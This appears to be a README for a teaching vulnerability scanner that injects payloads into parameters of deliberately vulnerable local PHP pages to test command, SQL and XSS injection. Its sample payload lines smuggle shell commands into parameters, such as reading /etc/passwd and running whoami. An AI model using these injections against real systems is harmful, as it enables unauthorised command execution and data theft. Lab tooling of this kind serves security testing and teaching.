The idea of this vulnerability scanner and command injection is to show some examples on how vulnerable parameters can be exploited in order to execute commands.
The scanner won't work on every environment, commands and arguments injections are based on linux commands.
- Python (for application code)
- PHP (for vulnerable server code)
- requests
- click
- selenium (version 4)
- webdriver-manager
- Chrome
The application code reads input files (created by the user) and send HTTP requests based on the specified method. Commands in payloads file will be injected into each parameter by using permutations. A different request will be sent for each payloads permutation.
Server response is elaborated in order to check vulnerabilities. This check is based on a simple idea of looking if specific strings are in response body.
If a vulnerability is found a descriptive line will be written inside the output file.
- Requests details file: used to specify the list of requests details containing HTTP method, resource and parameters under test.
The format used to specify the details is: HTTP method:resource:parameter1,parameter2,.. - Payloads file: used to specify the list of commands that will be used in a specific request (based on files row number).
The format used to specify the details is: command1~command2~..
GET:/ping.php:host
GET:/ping-escapeshellcmd.php:host
GET:/find-escapeshellcmd.php:input
GET:/ping-no-amp.php:host
POST:/login2.php:user,pass
GET:/search_by_price2.php:max
GET:/echo-name.php:name
;cat /etc/passwd
;ls -la
ping.php -exec whoami ;
;head ping.php
--noc
--noc
--xss
DEBUG = True # if True, code execution prints debugging lines
KEEP_BROWSER_OPEN = False # used to keep the browser open after selenium checks
TARGET = 'http://localhost:8000' # target
VULNERABILITY_OUTPUT_PATH = 'assets/output/vulnerability-output.txt' # output path
REQUESTS_SPLIT_VAL = ':' # split char for requests
REQUESTS_PARAMETERS_SPLIT_VAL = ',' # split char for parameters in requests
PAYLOADS_SPLIT_VAL = '~' # split char for commands values
CURRENT_USER = 'andre' # known user used for whoami test
COMMAND_COLUMNS_NUMBER = '--noc' # command to find the number of columns in a table. Valid only in sql mode
COMMAND_XSS_INJECTION = '--xss' # command to test xss injections. Valid only in xss mode
MAX_ALERT_WAITING_TIME = 5 # max time (in seconds) to wait for the popup message in browserThe data stored in the database will be used to test sql injections.
Execute files in sqli-target/setup to create and populate the database.
Connection credentials are stored in sqli-target/mysql_credentials.php file.
foo@bar:~$ cd "target environment"
foo@bar:~$ php -S localhost:8000foo@bar:~$ cd sqli-target
foo@bar:~$ php -S localhost:8000foo@bar:~$ cd xss-target
foo@bar:~$ php -S localhost:8000- -m, Injection mode, required. Permitted values [cmd, sql, xss]
- cmd: used to test commands and arguments injections.
- sql: used to test sql injections. In this mode payloads are used in a differt way than cmd mode. This mode is based on a specific command (in config file) used to perform a Union-based SQL injection. Other injections can be tested but no check is performed for them.
- xss: used to test xss injections for GET HTTP method. This mode is based on the idea of injecting payloads, checks if them are in the HTTP response and they are shown as dialog popup by using selenium.
- -r, Requests details file, required
- -p, Payloads file, required
foo@bar:~$ python main.py -m cmd -r assets/input/requests-details-cmd.txt -p assets/input/payloads-cmd.txtfoo@bar:~$ python main.py -m sql -r assets/input/requests-details-sql.txt -p assets/input/payloads-sql.txtfoo@bar:~$ python main.py -m xss -r assets/input/requests-details-xss.txt -p assets/input/payloads-xss.txtOutput file is saved on assets/output/vulnerability-output.txt file.